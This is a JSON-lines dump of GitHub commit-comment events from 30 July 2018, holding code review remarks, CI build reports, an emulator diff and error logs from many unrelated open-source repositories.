{"id":"8039328990","type":"CommitCommentEvent","actor":{"login":"wolfenste"},"repo":{"name":"wolfenste/tictactoe"},"payload":{"comment":{"id":29891335,"position":5,"line":28,"path":"tests/TicTacToeTest.php","commit_id":"cbdb6846766137c371be845c5e499a8c786f710e","created_at":"2018-07-30T18:01:57Z","updated_at":"2018-07-30T18:01:57Z","author_association":"OWNER","body":"*assertSame"}},"created_at":"2018-07-30T18:01:57Z"}
{"id":"8039331347","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"GLexx909/thinknetica"},"payload":{"comment":{"id":29891342,"position":3,"line":3,"path":"Part_5/car_cargo.rb","commit_id":"5b0d69d025f52ce60cf33b5065901409418b949f","created_at":"2018-07-30T18:02:24Z","updated_at":"2018-07-30T18:02:24Z","author_association":"NONE","body":"подробней про \"супер\" в классе КаргоТрейн"}},"created_at":"2018-07-30T18:02:24Z"}
{"id":"8039337414","type":"CommitCommentEvent","actor":{"login":"olegz"},"repo":{"name":"dsyer/spring-cloud-function"},"payload":{"comment":{"id":29891356,"position":264,"line":264,"path":"spring-cloud-function-webflux/src/main/java/org/springframework/cloud/function/web/flux/RequestProcessor.java","commit_id":"42966fc8ed271b8503861ca6f53ece2d0678506b","created_at":"2018-07-30T18:03:33Z","updated_at":"2018-07-30T18:03:33Z","author_association":"NONE","body":"@dsyer I get that, but it seems like I still see inconsistencies. For example:\r\n`HttpPostIntegrationTests.uppercaseSingleValue(..)`\r\nShould it really assert to `assertThat(result.getBody()).isEqualTo(\"(FOO)\");` instead of `assertThat(result.getBody()).isEqualTo(\"[\\\"(FOO)\\\"]\");`?\r\nWhat am I missing?"}},"created_at":"2018-07-30T18:03:33Z"}
{"id":"8039337619","type":"CommitCommentEvent","actor":{"login":"twinaphex"},"repo":{"name":"libretro/reicast-emulator"},"payload":{"comment":{"id":29891358,"position":null,"line":null,"path":null,"commit_id":"b7a698654b26efa15ef82b3ea4c2c846fd99bc1b","created_at":"2018-07-30T18:03:35Z","updated_at":"2018-07-30T18:03:35Z","author_association":"MEMBER","body":"Hmm, this diff applied against which commit? I ask because clip_verify isn't even defined right now in current master in sgc_if.cpp."}},"created_at":"2018-07-30T18:03:35Z"}
{"id":"8039340414","type":"CommitCommentEvent","actor":{"login":"agodemar"},"repo":{"name":"Aircraft-Design-UniNa/jpad"},"payload":{"comment":{"id":29891363,"position":null,"line":null,"path":null,"commit_id":"2dddf9730cf7ce08afab0fa29021a957c66c1202","created_at":"2018-07-30T18:04:08Z","updated_at":"2018-07-30T18:04:08Z","author_association":"CONTRIBUTOR","body":"Screenshot please, of `testBoolean04mds.brep`"}},"created_at":"2018-07-30T18:04:08Z"}
{"id":"8039343923","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29891368,"position":null,"line":null,"path":null,"commit_id":"494294b728244d0f123ea856a1b7b2a8fb400f2c","created_at":"2018-07-30T18:04:46Z","updated_at":"2018-07-30T18:04:46Z","author_association":"NONE","body":"develop (Myoldmopar) - i386-Windows-7-VisualStudio-14: OK (2328 of 2328 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-494294b728244d0f123ea856a1b7b2a8fb400f2c-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-494294b728244d0f123ea856a1b7b2a8fb400f2c-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-30T18:04:46Z"}
{"id":"8039344155","type":"CommitCommentEvent","actor":{"login":"LinkinFox"},"repo":{"name":"LinkinFox/Prueba"},"payload":{"comment":{"id":29891369,"position":null,"line":null,"path":null,"commit_id":"61b3ee5834d829c635c8c8180e5af69facac271b","created_at":"2018-07-30T18:04:49Z","updated_at":"2018-07-30T18:04:49Z","author_association":"OWNER","body":"hola mensaje web\r\n"}},"created_at":"2018-07-30T18:04:49Z"}
{"id":"8039350677","type":"CommitCommentEvent","actor":{"login":"vak2ve"},"repo":{"name":"HistoryAtState/frus"},"payload":{"comment":{"id":29891386,"position":null,"line":null,"path":null,"commit_id":"833ffb585aed04d80fa28782a8ae8410ffb32e21","created_at":"2018-07-30T18:05:59Z","updated_at":"2018-07-30T18:05:59Z","author_association":"CONTRIBUTOR","body":"@WaxCylinderRevival Ah, I thought I caught all the frus:attachments--thank you for spotting this one! I'll renumber and recommit right now."}},"created_at":"2018-07-30T18:05:59Z"}
{"id":"8039350716","type":"CommitCommentEvent","actor":{"login":"zorrikon"},"repo":{"name":"ether/etherpad-lite"},"payload":{"comment":{"id":29891387,"position":null,"line":null,"path":null,"commit_id":"a3ae374a67f898905e4ce12f5f92a02474f6b73a","created_at":"2018-07-30T18:05:59Z","updated_at":"2018-07-30T18:05:59Z","author_association":"NONE","body":"I wasn't able to run etherpad with this commit. The error I got was:\r\n\r\n```\r\n$ bin/run.sh\r\ncut: illegal option -- -\r\nusage: cut -b list [-n] [file ...]\r\n       cut -c list [file ...]\r\n       cut -f list [-s] [-d delim] [file ...]\r\ncut: illegal option -- -\r\nusage: cut -b list [-n] [file ...]\r\n       cut -c list [file ...]\r\n       cut -f list [-s] [-d delim] [file ...]\r\nCannot extract npm major version from version string \"5.6.0\"\r\n```\r\n\r\nThings worked when I did `git checkout ^1`. I'm on a Mac."}},"created_at":"2018-07-30T18:05:59Z"}
{"id":"8039351061","type":"CommitCommentEvent","actor":{"login":"liyishuai"},"repo":{"name":"liyishuai/coq-http2"},"payload":{"comment":{"id":29891388,"position":null,"line":null,"path":null,"commit_id":"6f116711dccb8a7b01b3d752bdcfc0463c44c43d","created_at":"2018-07-30T18:06:03Z","updated_at":"2018-07-30T18:06:03Z","author_association":"OWNER","body":"We should set the convention to use `Bvector` only for representing numbers, and `ByteVector` only for codec and representing strings.\r\nIf so, then by no means should we convert between `ByteVector` and numbers."}},"created_at":"2018-07-30T18:06:03Z"}
{"id":"8039351344","type":"CommitCommentEvent","actor":{"login":"Vyda97"},"repo":{"name":"albertopastormr/bod-ecv"},"payload":{"comment":{"id":29891390,"position":null,"line":null,"path":null,"commit_id":"a08ab1d0b1e6508ece063b3259a67a8dbd68b257","created_at":"2018-07-30T18:06:06Z","updated_at":"2018-07-30T18:06:06Z","author_association":"NONE","body":"xD"}},"created_at":"2018-07-30T18:06:06Z"}
{"id":"8039353404","type":"CommitCommentEvent","actor":{"login":"dillonwilliams"},"repo":{"name":"innolitics/pacsman"},"payload":{"comment":{"id":29891396,"position":7,"line":39,"path":"pacsman/filesystem_dev_client.py","commit_id":"ea464bd37a3632e64c33a899c50e9182c1537e43","created_at":"2018-07-30T18:06:26Z","updated_at":"2018-07-30T18:06:26Z","author_association":"CONTRIBUTOR","body":"I like using the initializers, but doesn't this still have the additional argument for `FilesystemDicomClient`? "}},"created_at":"2018-07-30T18:06:26Z"}
{"id":"8039359774","type":"CommitCommentEvent","actor":{"login":"twinaphex"},"repo":{"name":"libretro/reicast-emulator"},"payload":{"comment":{"id":29891412,"position":null,"line":null,"path":null,"commit_id":"b7a698654b26efa15ef82b3ea4c2c846fd99bc1b","created_at":"2018-07-30T18:07:37Z","updated_at":"2018-07-30T18:07:37Z","author_association":"MEMBER","body":"I applied this against current master and I still get the crash on startup -\r\n\r\nhttps://hastebin.com/yayusekiji.diff\r\n\r\nI have the feeling you are not on the latest master or something since there are parts of this diff that are not in the codebase anymore like clip_verify.\r\n\r\nc"}},"created_at":"2018-07-30T18:07:37Z"}
{"id":"8039363732","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29891420,"position":null,"line":null,"path":null,"commit_id":"e974771a70631b9ce4932f9ee057b99861528ec6","created_at":"2018-07-30T18:08:23Z","updated_at":"2018-07-30T18:08:23Z","author_association":"NONE","body":"develop (Myoldmopar) - x86_64-MacOS-10.9-clang: OK (2331 of 2331 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e974771a70631b9ce4932f9ee057b99861528ec6-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e974771a70631b9ce4932f9ee057b99861528ec6-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-30T18:08:23Z"}
{"id":"8039364347","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29891421,"position":null,"line":null,"path":null,"commit_id":"b9dc15ca1fc00bfa34d83d7080132432fbc08a10","created_at":"2018-07-30T18:08:30Z","updated_at":"2018-07-30T18:08:30Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-299](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-299).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-299-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-30T18:08:30Z"}
{"id":"8039365788","type":"CommitCommentEvent","actor":{"login":"ryantheleach"},"repo":{"name":"SpongePowered/SpongeAPI"},"payload":{"comment":{"id":29891427,"position":46,"line":46,"path":"src/main/java/org/spongepowered/api/event/permission/SubjectDataUpdateEvent.java","commit_id":"b909c8c30a37d0ee9dc9205bce23ed5dfc54faaf","created_at":"2018-07-30T18:08:47Z","updated_at":"2018-07-30T18:08:47Z","author_association":"MEMBER","body":"It's my understanding that this event is just to alert plugins to invalidate caches."}},"created_at":"2018-07-30T18:08:47Z"}
{"id":"8039366582","type":"CommitCommentEvent","actor":{"login":"WaxCylinderRevival"},"repo":{"name":"HistoryAtState/frus"},"payload":{"comment":{"id":29891430,"position":null,"line":null,"path":null,"commit_id":"833ffb585aed04d80fa28782a8ae8410ffb32e21","created_at":"2018-07-30T18:08:56Z","updated_at":"2018-07-30T18:08:56Z","author_association":"MEMBER","body":"@vak2ve, I just happened across this one as I checked for empty `date`.  \r\n\r\nThanks for doing the great work on restructuring these volumes!  I know they become more taxing as we move backwards in the chronology!"}},"created_at":"2018-07-30T18:08:56Z"}
{"id":"8039367489","type":"CommitCommentEvent","actor":{"login":"DmitriyKozyatinskiy"},"repo":{"name":"EnchantedOrange/EnchantedOrange.github.io"},"payload":{"comment":{"id":29891436,"position":6,"line":6,"path":"index.html","commit_id":"9b41e3810922ca943e9e26f46eb10682433eb715","created_at":"2018-07-30T18:09:08Z","updated_at":"2018-07-30T18:09:08Z","author_association":"NONE","body":"Используй либо одинарные кавычки, либо двойные, не надо смешивать\r\nВ хтмл предпочтительнее двойные кавычки, используй их."}},"created_at":"2018-07-30T18:09:08Z"}
{"id":"8039372777","type":"CommitCommentEvent","actor":{"login":"protonesso"},"repo":{"name":"JanusLinux/janus"},"payload":{"comment":{"id":29891453,"position":null,"line":null,"path":null,"commit_id":"f7d80842baf7e6af6707edc634fa3e09c44c2349","created_at":"2018-07-30T18:10:08Z","updated_at":"2018-07-30T18:10:08Z","author_association":"CONTRIBUTOR","body":"anyway gcc 8.2.0 works perfect"}},"created_at":"2018-07-30T18:10:08Z"}
{"id":"8039373104","type":"CommitCommentEvent","actor":{"login":"FrenzMcJ0hns0n"},"repo":{"name":"FrenzMcJ0hns0n/TiaDL"},"payload":{"comment":{"id":29891457,"position":null,"line":null,"path":null,"commit_id":"7efcb19383bdc094e166f211d34ce3783fc33d2a","created_at":"2018-07-30T18:10:11Z","updated_at":"2018-07-30T18:10:11Z","author_association":"OWNER","body":"I would be glad to know how to avoid this kind of useless commit after editing content directly on GitHub !"}},"created_at":"2018-07-30T18:10:11Z"}
{"id":"8039376707","type":"CommitCommentEvent","actor":{"login":"jens1o"},"repo":{"name":"robertohuertasm/url-checker"},"payload":{"comment":{"id":29891466,"position":21,"line":21,"path":"src/lib.rs","commit_id":"ae0454895b8c5a4dda9a0f21230433955e352778","created_at":"2018-07-30T18:10:51Z","updated_at":"2018-07-30T18:10:51Z","author_association":"NONE","body":"`return_false_if_url_is_not_correct`?"}},"created_at":"2018-07-30T18:10:51Z"}
{"id":"8039378035","type":"CommitCommentEvent","actor":{"login":"danwood76"},"repo":{"name":"danwood76/android_device_samsung_a3xeltexx"},"payload":{"comment":{"id":29891468,"position":621,"line":53,"path":"hardware/power/Power.cpp","commit_id":"aea5b984660ef01c3b7d8bce9580476c511cf6c3","created_at":"2018-07-30T18:11:07Z","updated_at":"2018-07-30T18:11:07Z","author_association":"OWNER","body":"This commit adds the setting to the user control panel and enables the DT2W functionality as expected:\r\nhttps://github.com/danwood76/android_device_samsung_a3xeltexx/commit/25f191e5144caed60419396e35f8fe07f4a20202"}},"created_at":"2018-07-30T18:11:07Z"}
{"id":"8039381474","type":"CommitCommentEvent","actor":{"login":"angad128"},"repo":{"name":"angad128/djangoTutorial"},"payload":{"comment":{"id":29891471,"position":null,"line":null,"path":null,"commit_id":"591f76df5907dac0e03f22ec5b169f53ce940d82","created_at":"2018-07-30T18:11:45Z","updated_at":"2018-07-30T18:11:45Z","author_association":"OWNER","body":"python manage.py migrate"}},"created_at":"2018-07-30T18:11:45Z"}
{"id":"8039382177","type":"CommitCommentEvent","actor":{"login":"WaxCylinderRevival"},"repo":{"name":"HistoryAtState/frus"},"payload":{"comment":{"id":29891472,"position":null,"line":null,"path":null,"commit_id":"3d9ab9ee197e56f58ea27aa429a35278fa9d7a4a","created_at":"2018-07-30T18:11:53Z","updated_at":"2018-07-30T18:11:53Z","author_association":"MEMBER","body":"Great, @vak2ve !\r\n\r\nBtw, I wonder why the classDecl/taxonomy expands rather than retaining the relative reference via xi:include...?"}},"created_at":"2018-07-30T18:11:53Z"}
{"id":"8039383107","type":"CommitCommentEvent","actor":{"login":"olegz"},"repo":{"name":"dsyer/spring-cloud-function"},"payload":{"comment":{"id":29891474,"position":279,"line":279,"path":"spring-cloud-function-webflux/src/main/java/org/springframework/cloud/function/web/flux/RequestProcessor.java","commit_id":"42966fc8ed271b8503861ca6f53ece2d0678506b","created_at":"2018-07-30T18:12:04Z","updated_at":"2018-07-30T18:12:04Z","author_association":"NONE","body":". . . continuing from above and following the difference between single and multiple, should we just have something like this:\r\n```\r\nreturn Flux.from(result).collectList().map(list -> list.size() == 1 ? list.get(0) : list)\r\n\t\t\t\t.flatMap(body -> Mono.just(builder.body(body)));\r\n```\r\ninstead of code in line 264-276?"}},"created_at":"2018-07-30T18:12:04Z"}
{"id":"8039386451","type":"CommitCommentEvent","actor":{"login":"zhachi66"},"repo":{"name":"zhachi66/facebrain.io"},"payload":{"comment":{"id":29891484,"position":null,"line":null,"path":null,"commit_id":"03637fd3367fcdd3d2a2520e9b75938f11863200","created_at":"2018-07-30T18:12:39Z","updated_at":"2018-07-30T18:12:39Z","author_association":"OWNER","body":"loo good"}},"created_at":"2018-07-30T18:12:39Z"}
{"id":"8039386606","type":"CommitCommentEvent","actor":{"login":"NaKyoung-Bnag"},"repo":{"name":"NaKyoung-Bnag/python101"},"payload":{"comment":{"id":29891485,"position":54,"line":54,"path":"_draft/ch05-write-file.md","commit_id":"b871f8075eabae44afef0a98849d33de70d44934","created_at":"2018-07-30T18:12:40Z","updated_at":"2018-07-30T18:12:40Z","author_association":"OWNER","body":"# with open(\"90_simple_tavg.csv\", \"r\") as f:  →  with open(\"90_simple_tavg.csv\", \"w\" ) as f: \r\n\r\n#안녕하세요! 김태곤 박사님. 석사생 방나경입니다. 올려주신 자료 너무 귀중하게 잘 읽고 따라하고 있습니다. 세세하게 설명해주셔서 처음 코딩을 접하는 저로서는 많은 공부가 되고 있습니다. 감사합니다. 따라하다가 이부분에서 오류가 생겨서 원인을 모르고 있다가 남교수님이 달아주신 댓글로 알아차렸습니다.. 22번째 줄에도 친절히 나와있는데 제가 간과했던것 같습니다. ㅠㅠ 늦게시작했지만 더 잘 읽어보고 따라해보도록 노력하겠습니다. 좋은 자료 올려주셔서 감사합니다!\r\n \r\n#오류내용\r\n Traceback (most recent call last):\r\n  File \"E:/Practice_python/python101/read_file_tokens_format_blank_write\", line 27, in <module>\r\n    f.write(\"year, temp_avg\\n\")\r\nio.UnsupportedOperation: not writable"}},"created_at":"2018-07-30T18:12:40Z"}
{"id":"8039388244","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29891488,"position":null,"line":null,"path":null,"commit_id":"ed0296ce9f0b5bdf4956c5b07a41890161956987","created_at":"2018-07-30T18:12:58Z","updated_at":"2018-07-30T18:12:58Z","author_association":"NONE","body":"158988131-Outdoor-air-node-wet-bulb-EMS-override (lgu1234) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2332 of 2332 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ed0296ce9f0b5bdf4956c5b07a41890161956987-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ed0296ce9f0b5bdf4956c5b07a41890161956987-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ed0296ce9f0b5bdf4956c5b07a41890161956987-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.2%25-green.png)</a>\n"}},"created_at":"2018-07-30T18:12:58Z"}
{"id":"8039388729","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":29891491,"position":null,"line":null,"path":null,"commit_id":"36318790a23c1f1eb2a5cc1e31cfebc84e9ae2fd","created_at":"2018-07-30T18:13:03Z","updated_at":"2018-07-30T18:13:03Z","author_association":"COLLABORATOR","body":"Emacs added tabs..."}},"created_at":"2018-07-30T18:13:03Z"}
{"id":"8039391980","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":29891496,"position":null,"line":null,"path":null,"commit_id":"2510d978a0ceb2da33ca3fbd980660cc3f1deaa6","created_at":"2018-07-30T18:13:39Z","updated_at":"2018-07-30T18:13:39Z","author_association":"COLLABORATOR","body":"I can only try at the moment because Travis is not sync'ing with my testing fork, so I could not test it."}},"created_at":"2018-07-30T18:13:39Z"}
{"id":"8039393192","type":"CommitCommentEvent","actor":{"login":"danwood76"},"repo":{"name":"danwood76/android_device_samsung_a3xeltexx"},"payload":{"comment":{"id":29891500,"position":300,"line":43,"path":"hardware/power/Power.h","commit_id":"aea5b984660ef01c3b7d8bce9580476c511cf6c3","created_at":"2018-07-30T18:13:53Z","updated_at":"2018-07-30T18:13:53Z","author_association":"OWNER","body":"This seems sufficient and this way the touchkey LEDs are still forced off when the screen is off:\r\nhttps://github.com/danwood76/android_device_samsung_a3xeltexx/commit/bdbbf353b67802e8799da4159bb3b5dfa3086b9f"}},"created_at":"2018-07-30T18:13:53Z"}
{"id":"8039393200","type":"CommitCommentEvent","actor":{"login":"flyinghead"},"repo":{"name":"libretro/reicast-emulator"},"payload":{"comment":{"id":29891501,"position":null,"line":null,"path":null,"commit_id":"b7a698654b26efa15ef82b3ea4c2c846fd99bc1b","created_at":"2018-07-30T18:13:53Z","updated_at":"2018-07-30T18:13:53Z","author_association":"NONE","body":"This was on my branch, sorry for the confusion.\r\nNow I'm at 1e42b367d8d65a31351a5d0437c105a7359051f7 on your master.\r\nHere is my diff;\r\n```\r\ndiff --git a/core/hw/aica/sgc_if.cpp b/core/hw/aica/sgc_if.cpp\r\nindex 480747f..0cd7607 100644\r\n--- a/core/hw/aica/sgc_if.cpp\r\n+++ b/core/hw/aica/sgc_if.cpp\r\n@@ -425,37 +425,6 @@ struct ChannelEx\r\n       oRight=FPMul(sample,logtable[dr],15);\r\n       oDsp=FPMul(sample,logtable[ds],15);\r\n \r\n-      if (settings.aica.EGHack)\r\n-      {\r\n-         if( (s64)(this->ccd->DL + mixl + mixr + *VolMix.DSPOut) == 0)\r\n-         {\r\n-            switch(this->AEG.GetState())\r\n-            {\r\n-               case EG_Decay1:\r\n-                  {\r\n-                     if(this->AEG.GetAttackRate() > this->AEG.GetDecay1Rate())\r\n-                     {\r\n-                        //printf(\"Promote 1\\n\");\r\n-                        this->SetAegState(EG_Attack);\r\n-                     }\r\n-\r\n-                     break;\r\n-                  }\r\n-\r\n-               case EG_Decay2:\r\n-                  {\r\n-                     if(this->AEG.GetAttackRate() > this->AEG.GetDecay2Rate())\r\n-                     {\r\n-                        //printf(\"Promote 2\\n\");\r\n-                        this->SetAegState(EG_Attack);\r\n-                     }\r\n-\r\n-                     break;\r\n-                  }\r\n-            }\r\n-         }\r\n-      }\r\n-\r\n       StepAEG(this);\r\n       StepFEG(this);\r\n       StepStream(this);\r\n@@ -708,6 +677,7 @@ struct ChannelEx\r\n                case 0x18://FNS\r\n                case 0x19://FNS,OCT\r\n                        UpdatePitch();\r\n+                       UpdateAEG();^M\r\n                        break;\r\n \r\n                case 0x1C://ALFOS,ALFOWS,PLFOS\r\n```"}},"created_at":"2018-07-30T18:13:53Z"}
{"id":"8039399049","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29891512,"position":null,"line":null,"path":null,"commit_id":"ed0296ce9f0b5bdf4956c5b07a41890161956987","created_at":"2018-07-30T18:14:55Z","updated_at":"2018-07-30T18:14:55Z","author_association":"NONE","body":"158988131-Outdoor-air-node-wet-bulb-EMS-override (lgu1234) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ed0296ce9f0b5bdf4956c5b07a41890161956987-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-30T18:14:55Z"}
{"id":"8039399893","type":"CommitCommentEvent","actor":{"login":"xu574303479"},"repo":{"name":"xu574303479/github-pages"},"payload":{"comment":{"id":29891514,"position":null,"line":null,"path":null,"commit_id":"e6581b14fae0b45c71c30b6bb46291443408b556","created_at":"2018-07-30T18:15:05Z","updated_at":"2018-07-30T18:15:05Z","author_association":"OWNER","body":"e"}},"created_at":"2018-07-30T18:15:05Z"}
{"id":"8039408186","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"GLexx909/thinknetica"},"payload":{"comment":{"id":29891536,"position":13,"line":13,"path":"Part_5/train.rb","commit_id":"5b0d69d025f52ce60cf33b5065901409418b949f","created_at":"2018-07-30T18:16:34Z","updated_at":"2018-07-30T18:16:34Z","author_association":"NONE","body":"ТЗ: \"К пассажирскому поезду можно прицепить только пассажирские, к грузовому - грузовые.\"\r\n\r\nвозможно лучше проверку типа вынести в классы-потомки\r\nпереопределить в них метод добавления вагона и там вызывать только эту проверку\r\n\r\nа если условие выполняется - вызывать \"супер\" и уже в родителе выполнять все остальные действия\r\n\r\nполучится небольшое дублирование в каждом из подклассов, но зато ТЗ будет выполнено более точно\r\nв нем ведь речь идет только про эти два подкласса, а про другие возможные подклассы и про сам класс Трейн речи в задании не идет"}},"created_at":"2018-07-30T18:16:34Z"}
{"id":"8039408823","type":"CommitCommentEvent","actor":{"login":"markheger"},"repo":{"name":"IBMStreams/streamsx.objectstorage"},"payload":{"comment":{"id":29891541,"position":null,"line":null,"path":null,"commit_id":"2bdc058513d6164b53a62d9aced30836083442f7","created_at":"2018-07-30T18:16:42Z","updated_at":"2018-07-30T18:16:42Z","author_association":"MEMBER","body":"#37 "}},"created_at":"2018-07-30T18:16:42Z"}
{"id":"8039409373","type":"CommitCommentEvent","actor":{"login":"DmitriyKozyatinskiy"},"repo":{"name":"EnchantedOrange/EnchantedOrange.github.io"},"payload":{"comment":{"id":29891544,"position":7,"line":7,"path":"index.html","commit_id":"9b41e3810922ca943e9e26f46eb10682433eb715","created_at":"2018-07-30T18:16:48Z","updated_at":"2018-07-30T18:16:48Z","author_association":"NONE","body":"`type='text/css'` не нужен, убери"}},"created_at":"2018-07-30T18:16:48Z"}
{"id":"8039419103","type":"CommitCommentEvent","actor":{"login":"DmitriyKozyatinskiy"},"repo":{"name":"EnchantedOrange/EnchantedOrange.github.io"},"payload":{"comment":{"id":29891556,"position":10,"line":10,"path":"index.html","commit_id":"9b41e3810922ca943e9e26f46eb10682433eb715","created_at":"2018-07-30T18:18:30Z","updated_at":"2018-07-30T18:18:30Z","author_association":"NONE","body":"Следи за выравниванием"}},"created_at":"2018-07-30T18:18:30Z"}
{"id":"8039421045","type":"CommitCommentEvent","actor":{"login":"Schrws"},"repo":{"name":"Schrws/Timeline-android"},"payload":{"comment":{"id":29891563,"position":null,"line":null,"path":null,"commit_id":"8b3de31385c7e2a17e6138b55e8d9ff8e8cf6f63","created_at":"2018-07-30T18:18:51Z","updated_at":"2018-07-30T18:18:51Z","author_association":"OWNER","body":"*** calendar.timeInMillis returns Long ***"}},"created_at":"2018-07-30T18:18:51Z"}
{"id":"8039422300","type":"CommitCommentEvent","actor":{"login":"ringote"},"repo":{"name":"thiagosantos/Carrinho-Abandonado---Magento"},"payload":{"comment":{"id":29891567,"position":null,"line":null,"path":null,"commit_id":"fc1fce6e978e65cd20cdc14482e63049ffe58653","created_at":"2018-07-30T18:19:06Z","updated_at":"2018-07-30T18:19:06Z","author_association":"NONE","body":"Ainda funciona?"}},"created_at":"2018-07-30T18:19:06Z"}
{"id":"8039453672","type":"CommitCommentEvent","actor":{"login":"wolfenste"},"repo":{"name":"wolfenste/tictactoe"},"payload":{"comment":{"id":29891634,"position":24,"line":26,"path":"tests/TicTacToeTest.php","commit_id":"2c4600804ea278039e6818b2183ec7fe284f2537","created_at":"2018-07-30T18:24:52Z","updated_at":"2018-07-30T18:24:52Z","author_association":"OWNER","body":"I cannot see the issue."}},"created_at":"2018-07-30T18:24:52Z"}
{"id":"8039455759","type":"CommitCommentEvent","actor":{"login":"PSRCode"},"repo":{"name":"compudj/lttng-tools-dev"},"payload":{"comment":{"id":29891639,"position":103,"line":103,"path":"tests/regression/tools/tracker/test_event_tracker","commit_id":"11caed7fd4b581de8c18d4216410fb97f19b573b","created_at":"2018-07-30T18:25:16Z","updated_at":"2018-07-30T18:25:16Z","author_association":"NONE","body":"Use utilities from utils.sh."}},"created_at":"2018-07-30T18:25:16Z"}
{"id":"8039457518","type":"CommitCommentEvent","actor":{"login":"twinaphex"},"repo":{"name":"libretro/reicast-emulator"},"payload":{"comment":{"id":29891643,"position":null,"line":null,"path":null,"commit_id":"b7a698654b26efa15ef82b3ea4c2c846fd99bc1b","created_at":"2018-07-30T18:25:36Z","updated_at":"2018-07-30T18:25:36Z","author_association":"MEMBER","body":"Thanks. Well, this is the exact same thing I changed, and it still crashes at startup, but only with the OIT renderer. \r\n\r\nNot sure what to do about it. Should I rebase everything and make it nearly identical to what you have in fh/mymaster right now?"}},"created_at":"2018-07-30T18:25:36Z"}
{"id":"8039457638","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29891644,"position":null,"line":null,"path":null,"commit_id":"732090f331e4882a5ab94802e599362f94afd450","created_at":"2018-07-30T18:25:37Z","updated_at":"2018-07-30T18:25:37Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-30T18:25:37Z"}
{"id":"8039457939","type":"CommitCommentEvent","actor":{"login":"DmitriyKozyatinskiy"},"repo":{"name":"EnchantedOrange/EnchantedOrange.github.io"},"payload":{"comment":{"id":29891647,"position":19,"line":19,"path":"index.html","commit_id":"9b41e3810922ca943e9e26f46eb10682433eb715","created_at":"2018-07-30T18:25:40Z","updated_at":"2018-07-30T18:25:40Z","author_association":"NONE","body":"двойные кавычки и одна строка - один тэг"}},"created_at":"2018-07-30T18:25:40Z"}
